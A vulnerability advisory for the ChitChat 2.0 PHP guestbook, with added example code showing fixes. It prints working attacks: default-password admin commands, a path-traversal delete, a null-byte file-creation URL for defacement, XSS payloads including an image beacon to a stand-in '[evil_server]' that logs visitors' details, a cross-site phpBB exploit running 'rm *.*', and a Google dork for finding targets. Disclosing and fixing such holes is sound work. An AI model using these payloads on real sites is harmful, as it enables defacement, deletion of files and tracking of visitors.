Cyber-Cats ChitChat 2.0 permits cross-site scripting attacks, allows for user-launched attacks, permits insecure file deletion, and suffers from other vulnerabilities.
bc678c07887a690d894b31d8adac6732edf83b236bee11457c029622a54e1439
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-identifier">Cyber-Cats ChitChat 2.0 permits cross-site scripting attacks,
lets users make other users launch exploits for them, lets remote users obtain information
on target users, and lets users insecurely delete/create files
software: Cyber-Cats ChitChat 2.0
site: http://www.cyber-cats.com/php/
1) This software uses a system of cheat codes (they are well explained inside the
chitchat.php code) to administer the guestbook; you can use them in the message body.
The problem is the default password "admin", so anyone can use these commands:
command::admin::change password::[new password]
command::admin::delete::[an archive filename without extension]
(archives are organized by date; today is 04/09/2005, so if the admin chose
year-month-day archiving, the current filename is 050904.txt)
command::admin::add ip::[ip address]
(to add an ip to ban list)
command::admin::remove ip::[ip address]
command::admin::list ips::
command::admin::add word::[a word]
(to add a word to censored list)
command::admin::remove word::[a word]
command::admin::list words
so a user can easily change the password. It is one-way encrypted, so an admin
has to reinstall the board or change it in passwd.txt; you can use this to encrypt
a new password:
<?php
// Produce the crypt() hash of a new admin password to paste into passwd.txt.
// 'MW' is the two-character salt from the original snippet; the original
// passed it as an undefined constant and never captured the return value.
$apassword = 'newpassword';
$hash = crypt($apassword, 'MW');
echo $hash;
?>
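The root cause of item 1 is that the cheat codes work while the shipped default password is still in place. The following is an added example, not ChitChat code, showing how a guestbook could refuse every admin command until the default has been replaced. It assumes passwd.txt holds a single crypt() hash (as the advisory describes) and that a cheat code is accompanied by the admin password; the function and variable names are hypothetical.

```php
<?php
// Added example, not part of ChitChat 2.0. Assumes passwd.txt contains one
// crypt() hash of the admin password and nothing else.
function read_admin_hash(string $passwd_file): string
{
    $h = @file_get_contents($passwd_file);
    return $h === false ? '' : trim($h);
}

// True while the stored hash still matches the shipped default "admin"
// (or while no hash exists at all). crypt() reuses the stored hash as salt.
function admin_password_is_default(string $stored_hash): bool
{
    if ($stored_hash === '') {
        return true;
    }
    return hash_equals($stored_hash, crypt('admin', $stored_hash));
}

// Gate for the command::admin::... cheat codes: refuse every command until
// the installer has changed the default, then require the real password.
function cheatcode_authorized(string $stored_hash, string $supplied): bool
{
    if (admin_password_is_default($stored_hash)) {
        return false;
    }
    return hash_equals($stored_hash, crypt($supplied, $stored_hash));
}

// Constructed check: a fresh install versus one whose password was changed.
$default_hash = crypt('admin', 'MW');
$changed_hash = crypt('s0me-long-passphrase', 'MW');
echo 'fresh install, correct default password: ',
     cheatcode_authorized($default_hash, 'admin') ? 'allowed' : 'refused', "\n";
echo 'changed password, wrong guess:           ',
     cheatcode_authorized($changed_hash, 'wrong') ? 'allowed' : 'refused', "\n";
echo 'changed password, correct password:      ',
     cheatcode_authorized($changed_hash, 's0me-long-passphrase') ? 'allowed' : 'refused', "\n";
```

The first two cases are refused and only the third is allowed. A change-password command should additionally reject the literal value "admin" so the board cannot be put back into the default state.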
2) Archive filenames are not properly filtered when you use the delete cheat code, so
you can traverse directories:
command::admin::delete::../../[some_textfilename_without_extension]
(you cannot change the .txt extension...)
Example, to delete the data.txt file:
command::admin::delete::../data
3) Insecure file creation:
you cannot overwrite files, but you can create an empty file anywhere on the system with
any extension you want using a null char:
http://[target]/chitchat/chitchat_mainpage.php?archive_file=../../../index.html%00
if the site's main page is an index.php, you have defaced it
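Items 2 and 3 share one defect: a user-supplied archive name is turned into a path without being checked. The following is an added example, not ChitChat code, of how the name should be validated before any delete or create; it assumes archives are stored as YYMMDD.txt in one directory, as the advisory describes, and the function name is hypothetical.

```php
<?php
// Added example, not part of ChitChat 2.0. Assumes archive files are named
// YYMMDD.txt and live directly under $archive_dir.
function safe_archive_path(string $archive_dir, string $name): ?string
{
    // Allow exactly six digits and nothing else. This rejects "../data",
    // embedded null bytes and any attempt to smuggle in an extension.
    if (!preg_match('/\A[0-9]{6}\z/', $name)) {
        return null;
    }
    $base = realpath($archive_dir);
    if ($base === false) {
        return null;
    }
    $path = $base . DIRECTORY_SEPARATOR . $name . '.txt';
    // Second line of defence: if the file exists, its resolved location
    // must still be inside the archive directory.
    $real = realpath($path);
    if ($real !== false && strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs: the two from the advisory plus two ordinary ones.
$inputs = [
    '050904',                // legitimate archive for 04/09/2005
    '../data',               // directory traversal from item 2
    "../../../index.html\0", // null-byte trick from item 3, after URL decoding
    '050904.txt',            // the caller must not supply the extension
];
foreach ($inputs as $in) {
    $out = safe_archive_path(sys_get_temp_dir(), $in);
    printf("%-26s => %s\n", addcslashes($in, "\0"),
           $out === null ? 'rejected' : 'ok: ' . $out);
}
```

Only the first input is accepted. An allow-list on the name is what makes the null byte irrelevant: the request never reaches a filesystem call with attacker-controlled bytes, so it does not matter how the PHP build treats a %00 in a path.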
4) Cross-site scripting:
in the website field, type:
"><script>alert("lol")</script>
so a user can log guestbook activity, for example:
"><img src="http://[evil_server]/script.php">
where script.php is:
<?php
// Append one line per visitor with connection and browser details.
// The original used bare $REMOTE_ADDR etc., which needs register_globals;
// $_SERVER works on any PHP version. A trailing semicolon was also missing.
$log = "log" . date("Ymd") . ".txt";
$fp = fopen($log, 'a');
fputs($fp, $_SERVER['REMOTE_ADDR'] . ":" . $_SERVER['REMOTE_PORT'] . " - " . $_SERVER['HTTP_USER_AGENT'] . "-" . $_SERVER['HTTP_REFERER'] . "-" . $_SERVER['REQUEST_METHOD'] . "-" . $_SERVER['QUERY_STRING'] . "-" . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . "-" . $_SERVER['REQUEST_URI'] . "\r\n");
fclose($fp);
?>
Also, a user can make other users launch an exploit for him; for example, against an old phpBB:
"><img src="http://[vulnerable_server]/phpBB/t=1&highlight='.system('rm *.*').'">
when a user opens the page, his browser issues the GET request for the exploit URL
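The website field is reflected into the page as-is, which is what lets a stored `"><script>` or `"><img src=...>` run in every visitor's browser. The following is an added example, not ChitChat code, of validating that field on input and encoding it on output; the function names and the sample values are constructed.

```php
<?php
// Added example, not part of ChitChat 2.0. Validates a guestbook "website"
// value on the way in and HTML-encodes it on the way out.
function normalize_website(string $input): ?string
{
    $input = trim($input);
    if ($input === '') {
        return null;
    }
    // Only absolute http(s) URLs qualify as a homepage link; this drops
    // javascript: URLs and anything that is not a URL at all.
    $parts = parse_url($input);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (filter_var($input, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    return $input;
}

// Encode every free-text field (name, message, website) for an HTML context.
function render_text(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_website_link(?string $site): string
{
    if ($site === null) {
        return '';
    }
    $enc = render_text($site);
    return '<a href="' . $enc . '" rel="nofollow noopener">' . $enc . '</a>';
}

// Constructed samples: one real site and three payload-shaped values.
$samples = [
    'http://www.cyber-cats.com/php/',
    '"><script>alert("lol")</script>',
    '"><img src="http://evil.example/script.php">',
    'javascript:alert(1)',
];
foreach ($samples as $s) {
    echo 'link: ', render_website_link(normalize_website($s)), "\n";
    echo 'text: ', render_text($s), "\n";
}
```

Only the first sample produces a link; the other three yield an empty link and, when shown as plain text, come out with `<`, `>` and `"` encoded, so neither the `<script>` tag nor the `<img>` beacon is ever parsed as markup. Encoding on output is the part that also covers the phpBB case above: a stored `<img src="...">` cannot make visitors' browsers issue the GET request if it is rendered as text.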
Google dorks: inurl:chitchat.php "choose graphic"
rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it
</span></span>
</code></pre>